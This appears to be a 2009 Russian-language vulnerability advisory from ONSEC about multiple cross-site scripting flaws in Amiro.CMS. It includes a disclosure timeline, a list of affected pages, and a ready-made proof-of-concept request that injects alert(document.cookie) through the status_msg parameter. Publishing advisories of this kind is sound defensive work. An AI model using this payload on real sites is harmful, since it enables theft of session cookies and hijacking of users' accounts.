Информационная безопасность

Уведомление о безопасности: [ONSEC-09-004] Amiro.CMS Multiple XSS
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version



Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  phpcms 2008 Remote File Disclosure Vulnerability

  [SECURITY] [DSA 1913-1] New bugzilla packages fix SQL injection

  [ONSEC-09-018] Twilight CMS XSS

  [ONSEC-09-005] Amiro.CMS root folder disclosure

From:ONSEC
Date:19 октября 2009 г.
Subject:[ONSEC-09-004] Amiro.CMS Multiple XSS

http://onsec.ru/vuln?id=11

[ONSEC-09-004] Amiro.CMS Multiple XSS
Цель: Amiro <= 5.4.0.0
Тип: Межсайтовый скриптинг
Угроза: Средняя
Дата обнаружения: 01.07.2009
Дата оповещения разработчика: 01.07.2009
Дата выхода исправления: 06.10.2009
Автор: Vladimir Vorontsov
OnSec Russian Security Group (onsec [dot] ru)
Описание: ====================================================
Уязвимость существует из-за недочета в функции проверки спецсимволов в строке параметра status_msg. Специально составленный запрос с тэгом [ALERT][/ALERT] позволяет выполнить в броузере жертвы любой JavaScript код. Параметр status_msg служит для уведомления пользователя и обрабатывается на страницах:
====================================================
http://localhost:7777/news
http://localhost:7777/comment
http://localhost:7777/forum
http://localhost:7777/blog
http://localhost:7777/tags
http://localhost:7777/_admin/forum.php
http://localhost:7777/_admin/discussion.php
http://localhost:7777/_admin/guestbook.php
http://localhost:7777/_admin/blog.php
http://localhost:7777/_admin/news.php
http://localhost:7777/_admin/srv_updates.php
http://localhost:7777/_admin/srv_backups.php
http://localhost:7777/_admin/srv_twist_prevention.php
http://localhost:7777/_admin/srv_tags.php
http://localhost:7777/_admin/srv_tags_reindex.php
http://localhost:7777/_admin/google_sitemap.php
http://localhost:7777/_admin/sitemap_history.php
http://localhost:7777/_admin/srv_options.php
http://localhost:7777/_admin/locales.php
http://localhost:7777/_admin/plugins_wizard.php

Специального вида строка параметра выглядит следующим образом (представление URL-decoded):

?status_msg=a:2:{s:3:"sys";a:0:{}s:5:"plain";a:1:{i:0;a:2:{s:
3:"msg";s:68:"ONsec.ru - XSS test[ALERT]\");alert(document.
cookie)//alert([/ALERT]";s:4:"type";s:4:
"none";}}}

Реализация:

http://localhost:
7777/news/?status_msg=a%3A2%3A%7Bs%3A3%3A%22sys%22%
3Ba%3A0%3A%7B%7Ds%3A5%3A%22plain%22%3Ba%3
A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bs%3A3%3A%22msg
%22%3Bs%3A68%3A%22ONsec.ru%20-
%20XSS%20test%5BALERT%5D%5C%27%29%3Balert%28d
ocument.
cookie%29%2F%2Falert%28%5B%2FALERT%5D%22%3Bs%
3A4%3A%22type%22%3Bs%3A4%3A%22none%22%3B%
7D%7D%7D
О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 


Rating@Mail.ru
test server